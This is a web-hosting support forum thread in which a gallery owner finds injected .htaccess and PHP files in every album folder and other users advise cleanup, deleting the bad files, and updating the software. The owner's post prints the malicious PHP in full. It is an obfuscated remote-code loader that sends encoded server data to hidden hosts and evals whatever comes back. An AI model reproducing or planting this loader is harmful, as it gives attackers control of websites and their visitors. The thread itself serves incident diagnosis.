Print

[metal13]

not sure what did it but every album directory has a htaccess file and a php file...
MY GALLERY :: 11565 files in 717 albums and 17 categories

There's no way i can delete them all... its gonna take forever to do that...
is there a way to batch delete them?
or make a main htaccess to ignore the htaccess in the directories?


my site: http://minipoy.com/media/index.php
( Warning: Adult content )

Installed plug-ins   

Name Onlinestats v1.8       
Name JUpload plugin Plugin v3.5.1          
Name Stats v1.1.1
Copy /Paste BB Code image url v1.2
Search Engine Friendly URLs v1.44 <<<< is it this one???

214106.php

Code: [Select]

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=
(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=
(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=
(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=
(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=
(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_en
code($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base
64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a4bfca0f6acea34f6f84287dcf6e4e25") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>


.htaccess

Code: [Select]

Options -MultiViews
ErrorDocument 404 //media/albums/Celebrities/A-B/AB Production/214106.php

[Nibbler]

You were probably hacked. See http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you want to learn how to use .htaccess files as you ask, read the Apache documentation.

[metal13]

i give up  ...tried my best  ... wasted 4 hours and all i got is a 500 server error on all pages every time... 

can someone help me please... i need an htaccess that can ignore all ".htaccess" in my albums folder... or ignore all htaccess in my server...

Nibbler... help meeeeeeeeeeeeeee................... pleeeeaaassseeee.........

[onthepike]

You were definitely hacked, and by the looks of it, based upon your htaccess file, hacked into your document root. Not good.

What version were you running at the time of this hack? I see that you are currently running 1.4.24.

I don't know of an automated way to delete all the htaccess files, but you should immediately delete the non-Coppermine (numbered) php files. Then delete each htaccess file within the albums folder. Then clean your web space entirely by eliminating files and folders that shouldn't be there and updating everything you're running.

I would begin by shutting down the gallery and placing it into maintenance mode. Make a backup of your include/config.inc.php file and your database (and any other custom file you may have). Then delete everything inside the media directory, except the albums folder. Then run through the albums folder and delete everything that's not an image.

Fire up your FTP client and get to work

[metal13]

its all gone now... i downloaded all my albums, search and removed then in my pc....then reuploaded them again...  hope it doesnt happen again...

[metal13]

its all gone now... i downloaded all my albums, search and removed them in my pc....then reuploaded them again...    hope it doesnt happen again...

[onthepike]

Hope it doesnt happen again.

Did you actually update your gallery, or simply clean out the "bad files" and re-upload?

Your version (1.4.24) is the same version it was when you posted. It should read 1.4.25 after update. Simply deleting the "bad files" isn't going to protect you. And what version of CPG were you running BEFORE you last updated, and when did you last update? And did you inspect the rest of your web space for "bad files" as well?

Did you perform all steps here: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you didn't, you'll be back here again.